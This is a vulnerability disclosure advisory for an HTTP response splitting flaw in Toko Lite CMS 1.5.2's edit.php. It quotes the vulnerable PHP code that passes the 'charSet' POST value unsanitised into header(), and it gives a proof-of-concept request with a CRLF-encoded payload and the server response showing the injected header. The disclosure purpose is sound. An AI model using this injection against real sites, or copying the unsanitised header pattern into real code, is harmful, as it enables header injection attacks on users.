Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability Vendor: Toko Product web page: http://toko-contenteditor.pageil.net Affected version: 1.5.2 Summary: Toko Web Content Editor cms is a compact, multi language, open source web editor and content management system (CMS). It is advanced easy to use yet fully featured program that can be integrated with any existing site. It takes 2 minuets to install even for non technical users. Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user. ==================================================================== /edit.php: -------------------------------------------------------------------- 3: $charSet = "iso-8859-1"; 4: $dir = "ltr"; 5: 6: if ( isset( $_POST[ "charSet" ] ) ) 7: { 8: $charSet = $_POST[ "charSet" ]; 9: 10: if ( $charSet == "windows-1255" ) 11: { 12: $dir = "rtl"; 13: } 14: } 15: 16: header( "Content-Type: text/html; charset=" . $charSet ); ==================================================================== Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2011-5048 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php CWE ID: 113 22.03.2011 ------------ POST /tokolite1.5.2/edit.php HTTP/1.1 Content-Length: 55 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection -- HTTP/1.1 302 Found Date: Tue, 22 Mar 2011 03:57:30 GMT Server: Apache/2.2.14 (Win32) X-Powered-By: PHP/5.3.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: Login.php Content-Length: 0 Keep-Alive: timeout=5, max=64 Connection: Keep-Alive Content-Type: text/html; charset= ZSL-Custom-Header: love_injection